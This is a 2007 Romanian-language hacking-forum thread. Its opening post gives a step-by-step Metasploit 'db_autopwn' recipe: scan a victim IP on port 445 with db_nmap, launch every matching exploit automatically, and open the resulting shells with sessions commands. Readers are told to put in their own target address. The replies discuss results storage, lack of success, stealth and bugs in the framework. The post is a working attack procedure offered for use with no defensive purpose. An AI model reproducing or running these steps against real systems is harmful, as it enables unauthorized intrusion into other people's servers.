c0der Posted July 27, 2007 Report Posted July 27, 2007 #Exemplu avansat de automatizare a exploiturilor pe un anumit tip de ip, folosind comenzi din consola shell[terminal] in metasploit# practic luam fiecare exploit din baza de date a metasploitului, si le testeaza pe serverul tinta # ip ul 127.0.0.1 va fi folosit ca ip ul victimei - voi o sa puneti alt ip# algoritmul "db_autopwn" are urmatoarele optiuni :-t : show all matching exploit modules-x : select modules based on vulnerability references-p : select modules based on open ports-e : launch exploits against all matched targets-s : only obtain a single shell per target system-r : use a reverse connect shell-b : use a bind shell on a random port-h : display this help text_____________________________________________Pasii care trebuiesc urmati:./msfconsoleload db_postgresdb_create testerdb_hostsdb_nmap 127.0.0.1 -p 445db_hostsdb_autopwndb_autopwn -t -p -e -s -bsessions -lsessions -i 1sper sa va fie de folos pt cei care utilizati metasploit.Numai Bine. Quote
escalation666 Posted August 3, 2007 Report Posted August 3, 2007 Rezultatele se salveaza in postgres...ca doar nu degeaba folosesti baza de date...daca te uiti prin scripturi pe acolo ai sa vezi exact cum se numeste...cu sessions -l vezi cate sesiuni active ai...si cu sessions -i intereactionezi cu ele....nu prea ai ce salva Apropo de automatizarea asta....eu am incercat acu cateva luni in urma...si fara nici un rezultat valabil....exista cineva care o avut rezultate?Asa...si ca o ultima completare de ex daca pui sa exploateze portul 80....nu ar fi stealth deloc, pentru ca ar incerca toate exploiturile pe care le are pentru portul 80, deci daca target-ul meu ruleaza un Apache, degeaba autopwn-ul va incerca exploituri de IIS de exemplu. Oricum is putin dezamagit de ultima versiune de framework pentru ca e putin buggy... Quote
moubik Posted August 3, 2007 Report Posted August 3, 2007 din cate auzisem metasploit V3 ar fi trebuit sa automatizeze scanarile.asta e doar ce am auzit cat de adevarat e... nu prea Quote
